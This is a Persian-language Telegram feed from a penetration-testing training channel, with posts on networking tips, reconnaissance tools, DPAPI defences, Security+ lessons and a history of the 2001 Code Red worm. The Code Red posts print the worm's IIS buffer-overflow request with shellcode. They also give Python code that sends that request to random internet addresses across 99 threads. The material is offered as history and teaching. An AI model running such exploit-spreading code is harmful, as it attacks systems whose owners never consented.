Try Hack Box – Telegram
Try Hack Box
5.76K subscribers
680 photos
65 videos
123 files
689 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
⚒️ پورت ها و پروتکل های کلیدی شبکه های کامپیوتری : نکته ای برای هکرهای اخلاقی

#شبکه #network
@TryHackBox
7👍2
💡اگر نام دستوری را در لینوکس به خاطر نمی آورید، فقط از کلمات کلیدی برای جستجو در صفحات man استفاده کنید.
$ man -k grep

#tips #linux
#نکته #لینوکس
@TryHackBox
10
از چه پیام رسان هایی استفاده میکنید ؟ ( به جز تلگرام)
Anonymous Poll
32%
لینکدین
37%
توییتر
58%
اینستاگرام
9%
سیگنال
9%
توی کامنت ها میگم
🔴در دنیای امنیت سایبری و فناوری اطلاعات، مهارت‌های عملی و تجربه‌های واقعی اهمیت زیادی دارند. سایت challenginno.ir  با الهام از پلتفرم‌هایی مانند Hack the Box و Try Hack Me، محیطی را برای علاقه‌مندان به امنیت سایبری فراهم کرده است تا بتوانند با شرکت در چالش‌های مختلف، مهارت‌های خود را در این زمینه تقویت کنند.

🔻این سایت، یک پلتفرم آموزشی و چالش‌محور است که به کاربران امکان می‌دهد تا با شرکت در چالش‌های امنیت سایبری، دانش خود را در حوزه‌های مختلف امنیت سایبری مانند تست نفوذ و ارزیابی امنیتی، تیم قرمز، تیم آبی، فارنزیک، شکار تهدید (Threat Hunting) و غیره بهبود بخشند.

🔻همچنین برگزاری RedTime/BlueTime ها و برگزاری دوره‌های مبتنی بر چالش، رویکردهای دیگری است که در این پلتفرم قرار داده خواهد شد.

اگر به دنبال تقویت مهارت‌های امنیت سایبری خود به‌وسیله حل چالش‌های واقعی امنیت سایبری هستید به challenginno بپیوندید:

🌐https://challenginno.ir
🪩https://news.1rj.ru/str/challenginno
👍4
💻 به تیم مدرسان TryHackBox بپیوندید!

تیم TryHackBox در حال گسترش تیم مدرسان خود است و از متخصصان حوزه امنیت سایبری، تست نفوذ، تیم قرمز (Red Team) و تیم دفاعی (Blue Team) دعوت می‌کند تا به ما بپیوندند.

اگر شما تجربه عملی و تخصص در یکی از حوزه‌های امنیت سایبری دارید و علاقه‌مند به انتقال دانش و تجربیات خود به دیگران هستید.

همچنین اگر می‌خواهید در یک جامعه آموزشی پویا و حرفه‌ای فعالیت کنید، ما فرصتی ایده‌آل برای شما داریم

در کنارتان هستیم تا دوره‌های آموزشی خود را طراحی و تدریس کنید و از حمایت تیم ما برای تولید محتوای باکیفیت بهره‌مند شوید.

همچنین درآمدی متناسب با مهارت‌های خود داشته باشید و در رشد جامعه امنیت سایبری نقش مؤثری ایفا کنید.

درصورت تمایل رزومه خود را برای ما ارسال کنید.

Telegram: @TryHackBoxBot
Gmail: TryHackBox@gmail.com
3
شودان چیست.pdf
649.3 KB
🔖 شودان  یک موتور جست‌وجو برای دستگاه‌های متصل به اینترنت است. این ابزار به طور منظم اینترنت را اسکن می‌کند و اطلاعاتی درباره پورت‌ها و سرویس‌های در حال اجرا روی دستگاه‌ها جمع‌آوری می‌کند.

🔶️ این فایل اپدیت خواهد شد .
#Shodan
@TryHackBox
SSL گواهی.pdf
385.7 KB
🔖 چگونه گواهی‌های منقضی شده در حملات مهندسی اجتماعی استفاده می‌شوند؟
مطالب :
1. مفهوم گواهی SSL/TLS
2. چرا گواهی‌های منقضی شده خطرناک هستند؟
3. نحوه استفاده از گواهی‌های منقضی شده در مهندسی اجتماعی
4. مثال
5. چگونه از این نوع حملات جلوگیری کنیم؟

تهیه شده توسط : کاوه
#مهندسی_اجتماعی #ssl

@TryHackBox
👍5
Forwarded from P.F.K Security
Media is too big
VIEW IN TELEGRAM
در این جلسه، تمرکز بر روی تاکتیک‌های تیم قرمز (Red Team) در زمینه اینترنت اشیاء (IoT) است. در ابتدا، اشاره می‌شود که دستگاه‌های روزمره مانند توسترها و توالت‌ها که نباید به اینترنت متصل شوند، در این بحث گنجانده نمی‌شوند. سخنران که یک تحلیل‌گر امنیتی در Black Hills Information Security است، بر اهمیت یادگیری و آموزش تکنیک‌های هک تأکید می‌کند.
توضیحات این ویدئو ادامه دارد در پایین بخوانید .
#RedTeam
@PfkSecurity
Forwarded from P.F.K Security
P.F.K Security
در این جلسه، تمرکز بر روی تاکتیک‌های تیم قرمز (Red Team) در زمینه اینترنت اشیاء (IoT) است. در ابتدا، اشاره می‌شود که دستگاه‌های روزمره مانند توسترها و توالت‌ها که نباید به اینترنت متصل شوند، در این بحث گنجانده نمی‌شوند. سخنران که یک تحلیل‌گر امنیتی در Black…
ابزارهایی مانند USB rubber duckies و LAN turtles به عنوان وسایلی برای گسترش قابلیت‌های تیم قرمز معرفی می‌شوند. Hack5 به عنوان یک سازمان کلیدی در تولید دستگاه‌های سخت‌افزاری برای تست نفوذ و تیم قرمز ذکر می‌شود. دو نوع اصلی حمله با استفاده از این دستگاه‌ها شناسایی می‌شود: حملات فرصت‌طلبانه و حملات دسترسی از راه دور.

سخنران به چالش‌های جمع‌آوری داده و خروج اطلاعات در سازمان‌های بزرگ با نظارت شبکه‌ای سختگیرانه اشاره می‌کند. همچنین، تکنولوژی‌های بی‌سیم مانند بلوتوث و Wi-Fi به عنوان روش‌های ممکن برای خروج داده‌ها مورد بحث قرار می‌گیرند، اما در محیط‌های امن ممکن است با چالش‌هایی مواجه شوند.

در ادامه، به تکنولوژی LoRa اشاره می‌شود که به دلیل مصرف کم انرژی و قابلیت‌های برد بلند، برای دستگاه‌های IoT مناسب است. همچنین، محدودیت‌هایی مانند اندازه حداکثر بسته ۲۵۵ بایتی LoRa نیز مطرح می‌شود. سخنران تجربیات خود را در طراحی مدارهای چاپی برای کنترل یک ماهواره شبیه‌سازی شده با استفاده از تکنولوژی LoRa به اشتراک می‌گذارد.

در بخش‌های بعدی، یک حمله USB rubber ducky به نمایش گذاشته می‌شود که شامل تزریق کلیدها برای باز کردن یک پست وبلاگ است. همچنین، استفاده از Raspberry Pi Zero با یک برد LoRaPi برای ارتباطات بی‌سیم و قابلیت‌های مختلف مورد بحث قرار می‌گیرد.

در نهایت، توصیه‌هایی برای جلوگیری از حملات فیزیکی و نظارت بر ترافیک شبکه ارائه می‌شود. تأکید بر اهمیت امنیت فیزیکی و انجام بازرسی‌های منظم برای شناسایی دستگاه‌های غیرمجاز نیز مطرح می‌شود. در کل، این جلسه به بررسی چالش‌ها و فرصت‌های موجود در زمینه امنیت IoT و تاکتیک‌های تیم قرمز می‌پردازد.

@Pfksecurity
👍4
Try Hack Box
ابزارهای مورد استفاده در حملات DPAPI مهاجمان از ابزارهای مختلفی برای سوءاستفاده از DPAPI استفاده می‌کنند، از جمله: 1. Mimikatz: میمیکتز یک ابزار قدرتمند است که می‌تواند کلیدهای اصلی DPAPI را استخراج و رمزگشایی کند. این ابزار همچنین می‌تواند رمزعبورهای کاربران…
÷÷راه‌های مقابله با حملات DPAPI

محدود کردن دسترسی فیزیکی:

دسترسی فیزیکی به سیستم‌ها را محدود کنید تا مهاجمان نتوانند به کلیدهای DPAPI دسترسی پیدا کنند.

استفاده از رمزعبورهای قوی:

از رمزعبورهای قوی و پیچیده برای حساب‌های کاربری استفاده کنید تا مهاجمان نتوانند به راحتی کلیدهای اصلی را رمزگشایی کنند.

فعال‌سازی BitLocker:


می‌تواند از کلیدهای DPAPI محافظت کند و دسترسی مهاجمان به داده‌های رمزگذاری‌شده را سخت‌تر کند.

مانیتورینگ و لاگ‌گیری:

فعالیت‌های مشکوک در سیستم را مانیتور کنید و از ابزارهای امنیتی برای شناسایی حملات احتمالی استفاده کنید.

آموزش کاربران:

کاربران را در مورد خطرات حملات سایبری و اهمیت محافظت از رمزعبورها آموزش دهید.

سوءاستفاده از DPAPI یک تکنیک خطرناک است که می‌تواند منجر به سرقت اطلاعات حساس مانند رمزعبورها، کلیدهای رمزنگاری و دیگر داده‌های محرمانه شود. با محدود کردن دسترسی به سیستم، استفاده از رمزعبورهای قوی و فعال‌سازی مکانیزم‌های امنیتی مانند BitLocker، می‌توانید از سیستم خود در برابر این نوع حملات محافظت کنید.

#DPAPI
@TryHackBox
Try Hack Box
#جلسه_سوم دوره #رایگان سکوریتی پلاس | Security + بخش : مهندسی اجتماعی دوره Security+ یک دوره معتبر و پایه‌ای در زمینه امنیت سایبری است که توسط CompTIA ارائه می‌شود. این دوره به شما مهارت‌های لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیاده‌سازی…
#جلسه_چهارم دوره #رایگان سکوریتی پلاس | Security +

بخش : رمزنگاری

دوره Security+ یک دوره معتبر و پایه‌ای در زمینه امنیت سایبری است که توسط CompTIA ارائه می‌شود. این دوره به شما مهارت‌های لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیاده‌سازی راهکارهای امنیتی،اصول رمزنگاری و درک اصول امنیت شبکه را آموزش می‌دهد.

قسمت اول :
  https://youtu.be/Hn5qheOVz6Q
قسمت دوم :
https://youtu.be/R8Qzq0qQm3Q
قسمت سوم :
https://youtu.be/bE1KSm7U8uE
قسمت چهارم :
https://youtu.be/wOFhAGvFCSA
انتقادی داشتید حتما اطلاع بدید، تا بتونیم آموزش با کیفیت‌تری ارائه بدیم،امیدواریم از آموزش لذت ببرید.


----------
🆔 @TryHackBox
----------
👍4
Try Hack Box
#جلسه_چهارم دوره #رایگان سکوریتی پلاس | Security + بخش : رمزنگاری دوره Security+ یک دوره معتبر و پایه‌ای در زمینه امنیت سایبری است که توسط CompTIA ارائه می‌شود. این دوره به شما مهارت‌های لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیاده‌سازی…
دوستانی که دوره سکوریتی پلاس مارو میگذرونند ، ما یک گروه ایجاد کردیم که فایل تمرینی یا اگر سوالی یا مشکلی داشتید بپرسید و فایل ها رو در اختیارتون قرار بدیم اگر مایل بودید به گروه بپیوندید به ما پیام دهید لینک گروه رو ارسال کنیم برای شما :

@Unique_exploitbot
BuiltWith.pdf
869.9 KB
[+] What is BuiltWith ?

[+] کاربرد BuiltWith برای هکرها و پنتسترها .
[+] منظور از داده‌های تاریخی چیست؟
[+] استفاده هکرها و پنتسترها از داده‌های تاریخی.
[+] مثال برای هکرها و پنتسترها .
[+] ابزارها و دستورات برای جمع‌آوری داده‌های تاریخی
[+] ابزارها و دستورات برای تحلیل داده‌های تاریخی
[+] مثال عملی
[+] چگونه لیستی از دامنه‌هایی که به احتمال زیاد متعلق به مالک یک سایت خاص هستند را به دست آوریم؟
#BuiltWith
@TryHackBox
👍7🙏2
Try Hack Box
BuiltWith.pdf
فایل اپدیت شد دوستان
👍1
This media is not supported in your browser
VIEW IN TELEGRAM
سریال روز صفر Zero Day 2025

مینی‌سریال "روز صفر" داستان رئیس‌جمهور سابق ایالات متحده "جرج مالن" را روایت می‌کند که مأموریت دارد عاملان یک حمله سایبری ویرانگر را که کشور را دچار هرج‌ومرج کرده است، شناسایی کند. در جریان تحقیقات، او با رازهای تاریک خود مواجه شده و نزدیکانش را در معرض خطر می‌بیند و ...
#معرفی_فیلم
@TryHackBox
👍3
Forwarded from TryHackBox Story
🪱 کد رد (Code Red)

صبح روز ۱۵ ژوئیه ۲۰۰۱: تحلیلگران شرکت eEye Digital Security در حالی که آخرین جرعه‌های نوشیدنی گازدار محبوبشان، Code Red Mountain Dew، را می‌نوشیدند، با هشدارهایی درباره گسترش سریع یک کرم کامپیوتری جدید مواجه شدند. همین موضوع باعث شد نام این بدافزار را به یاد نوشیدنی مورد علاقه‌شان، «کد رد» بگذارند. این نام برای بسیاری از قربانیان کرم به یاد ماندنی شد، چرا که در عرض چند روز، کد رد اینترنت را تسخیر کرد.

چگونگی گسترش کرم: بعدها مشخص شد که گسترش این کرم از ۱۳ ژوئیه ۲۰۰۱ آغاز شده بود. این بدافزار از یک آسیب‌پذیری در وب‌سرور Internet Information Server (IIS) استفاده می‌کرد که مربوط به سرریز بافر (Buffer Overflow) بود. اگرچه مایکروسافت یک ماه قبل از این اتفاق، وصله‌ای برای رفع این آسیب‌پذیری منتشر کرده بود، اما بسیاری از مدیران سیستم‌ها به‌موقع این به‌روزرسانی را نصب نکرده بودند. همین موضوع دلیل اصلی شیوع گسترده این کرم شد.

آسیب‌پذیری مورد استفاده: کرم اینترنتی از یک آسیب‌پذیری ساده در یکی از ماژول‌های وب‌سرور، به‌طور خاص در بخش افزونه‌ایندکس کردن داده‌ها، سوءاستفاده می‌کرد. در کتابخانه idq.dll یک اشکال مربوط به سرریز بافر وجود داشت. این آسیب‌پذیری با شناسه MS01-33 شناخته می‌شد. با استانداردهای امروزی، این یک اشکال بسیار ساده است که می‌توان با ارسال یک درخواست بسیار طولانی به سرور، آن را مورد سوءاستفاده قرار داد. مثلاً:

GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0

در این درخواست، داده‌های بعد از کاراکترهای N به عنوان دستورات تفسیر و اجرا می‌شوند. تمام کد مخرب در خود درخواست قرار دارد، بنابراین اگر سرور آسیب‌پذیر باشد، بلافاصله و با احتمال ۱۰۰٪ آلوده می‌شود.

رفتار کرم: رفتار کرم بسته به تاریخ روز متفاوت بود. از روز ۱ تا ۱۹ هر ماه، کرم فقط به گسترش خود می‌پرداخت: با اسکن سرورهای اینترنتی، درخواست‌های مخرب را به آن‌ها ارسال می‌کرد. برای این کار، روی هر سیستم آلوده، ۹۹ thread موازی ایجاد می‌شد که هر کدام لیستی از کامپیوترهای جدید برای آلوده‌سازی را تولید می‌کردند. از روز ۲۰ تا ۲۷ هر ماه، کرم حملات DDoS را علیه لیستی از آدرس‌های IP که در کد آن تعبیه شده بود، انجام می‌داد. یکی از این آدرس‌ها، مربوط به وب‌سایت کاخ سفید بود.

اوج شیوع: اگرچه گسترش کرم در ۱۵ ژوئیه ۲۰۰۱ گزارش شد، اما اوج آن در ۱۹ ژوئیه اتفاق افتاد، زمانی که بیش از ۳۵۹ هزار سرور آلوده شده بودند. بعدها، با نصب به‌روزرسانی‌های امنیتی مایکروسافت توسط مدیران سیستم‌ها، شیوع کرم کاهش یافت. البته نسخه دوم کرم با نام Code Red II نیز ظهور کرد که از کاراکترهای X به جای N در درخواست‌های خود استفاده می‌کرد.

نتیجه‌گیری: از این ماجرا دو درس مهم می‌توان گرفت. اول اینکه نصب به‌موقع وصله‌های امنیتی که ۲۴ سال پیش اهمیت زیادی داشت، هنوز هم موضوعی حیاتی است. دوم اینکه خوش‌شانسی بزرگی بود که کد رد فایل‌ها را رمزنگاری نمی‌کرد، پسوردها را نمی‌دزدید یا داده‌ها را نابود نمی‌کرد. اگر هدف مهاجمان مخرب‌تر بود، عواقب این حمله می‌توانست بسیار فاجعه‌بارتر باشد.

@TryHackBoxStory
👍5
Forwarded from TryHackBox Story
TryHackBox Story
🪱 کد رد (Code Red) • صبح روز ۱۵ ژوئیه ۲۰۰۱: تحلیلگران شرکت eEye Digital Security در حالی که آخرین جرعه‌های نوشیدنی گازدار محبوبشان، Code Red Mountain Dew، را می‌نوشیدند، با هشدارهایی درباره گسترش سریع یک کرم کامپیوتری جدید مواجه شدند. همین موضوع باعث شد نام…
تحلیل حمله بر فرض مثال چطوری کرم گسترش پیدا کرده :

۱. روش اصلی حمله: سوءاستفاده از آسیب‌پذیری سرریز بافر (Buffer Overflow)


هدف: وب‌سرورهای Microsoft IIS (Internet Information Services) که نسخه‌های آسیب‌پذیر کتابخانه idq.dll را اجرا می‌کردند.

مکانیزم:
کرم با ارسال یک درخواست HTTP مخرب به شکل زیر، باعث سرریز بافر در ماژول ایندکس‌سازی (Indexing Service) می‌شد:

GET /default.ida?[رشته طولانی از Nها]%u9090%u6858%ucbd3%u7801... HTTP/1.0

رشته Nها باعث سرریز بافر و بازنویسی حافظه می‌شد.

کد هگزادسیمال بعدی (%u9090...) حاوی دستورات ماشینی (Shellcode) بود که کنترل سرور را به مهاجم می‌داد.

۲. روش‌های گسترش خودکار

+ اسکن تصادفی IPها:
کرم به صورت خودکار آدرس‌های IP تصادفی را اسکن می‌کرد و به هر سروری که پورت ۸۰ (HTTP) باز بود، درخواست مخرب خود را ارسال می‌نمود.

اسکن تصادفی IPها
کرم Code Red از الگوریتم‌های ساده‌ای برای تولید آدرس‌های IP تصادفی استفاده می‌کرد. در پایتون، این فرآیند را می‌توان به صورت زیر شبیه‌سازی کرد:

import random

def generate_random_ip():
    return ".".join(str(random.randint(0, 255)) for _ in range(4))

# مثال: تولید ۱۰ آدرس IP تصادفی
for _ in range(10):
    print(generate_random_ip())

+ ارسال درخواست مخرب به پورت ۸۰
کرم پس از پیدا کردن یک سرور با پورت ۸۰ باز، درخواست HTTP مخرب خود را ارسال می‌کرد. در پایتون، این کار را می‌توان با استفاده از کتابخانه socket شبیه‌سازی کرد:

import socket

def send_malicious_request(ip):
    try:
        # ایجاد یک سوکت TCP
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(2)  # تنظیم timeout برای اتصال
        sock.connect((ip, 80))  # اتصال به پورت ۸۰
       
        # ارسال درخواست مخرب
        malicious_request = (
            "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0\r\n"
            "Host: example.com\r\n"
            "\r\n"
        )
        sock.send(malicious_request.encode())
       
        # دریافت پاسخ (اختیاری)
        response = sock.recv(4096)
        print(f"Response from {ip}: {response.decode()}")
       
        sock.close()
    except Exception as e:
        print(f"Failed to connect to {ip}: {e}")

# مثال: ارسال درخواست به یک IP تصادفی
random_ip = generate_random_ip()
send_malicious_request(random_ip)

تکثیر موازی:
روی هر سیستم آلوده، ۹۹ thread موازی ایجاد می‌کرد تا اسکن و آلوده‌سازی را تسریع کند.

+ ایجاد Threadهای موازی برای اسکن و آلوده‌سازی
کرم Code Red از ۹۹ thread موازی برای تسریع فرآیند اسکن و آلوده‌سازی استفاده می‌کرد. در پایتون، این کار را می‌توان با استفاده از کتابخانه threading شبیه‌سازی کرد:

import threading

def scan_and_infect(ip):
    print(f"Scanning {ip}...")
    send_malicious_request(ip)

# ایجاد ۹۹ thread موازی
threads = []
for _ in range(99):
    ip = generate_random_ip()
    thread = threading.Thread(target=scan_and_infect, args=(ip,))
    thread.start()
    threads.append(thread)

# منتظر ماندن برای اتمام تمام threadها
for thread in threads:
    thread.join()

---

عدم نیاز به تعامل کاربر:
برخلاف بسیاری از بدافزارها، Code Red برای گسترش نیازی به کلیک کاربر یا اجرای فایل پیوست نداشت. تنها کافی بود سرور به اینترنت متصل باشد!

جمع‌بندی
این کدها صرفاً برای درک بهتر مکانیزم‌های گسترش کرم Code Red ارائه شده‌اند. امروزه، چنین حملاتی با استفاده از فایروال‌ها، سیستم‌های تشخیص نفوذ (IDS)، و به‌روزرسانی‌های امنیتی به راحتی قابل پیشگیری هستند.

@TryHackBoxStory
2
🔖 Cyberdefense Active Directory Mindmap v2025.03

یک برگه تقلب فوق‌العاده دقیق برای بررسی زیرساخت‌های AD .

➡️ SVG
➡️ PNG

⛺️ Home

#AD
@TryHackBox
🙏21
Forwarded from TryHackBox Story
Hack Bank With Social Enginnering pdf.pdf
596.7 KB
داستان واقعی هک بانک با استفاده از روش های مهندسی اجتماعی ...

این مقاله درباره نفوذ فیزیکی به یکی از بانک‌های لبنان است. یک پروژه قانونی با پایانی غیرمنتظره که توسط یکی از مشهورترین متخصصان تست نفوذ فیزیکی، جیسون ای. استریت (https://jaysonestreet.com/) انجام شده است!

• کل داستان مجموعه‌ای از واقعیت‌ها است که با نظرات شخصی او از سخنرانی‌ها، مصاحبه‌ها و گفت‌وگوهای پشت صحنه ترکیب شده است. اگر علاقه‌مندید بدانید چگونه امنیت فیزیکی یک بانک با استفاده از مهندسی اجتماعی آزمایش شده ...
@TryHackBoxStory
@TryHackBox
@TryHackBoxOfficial
👍5🙏1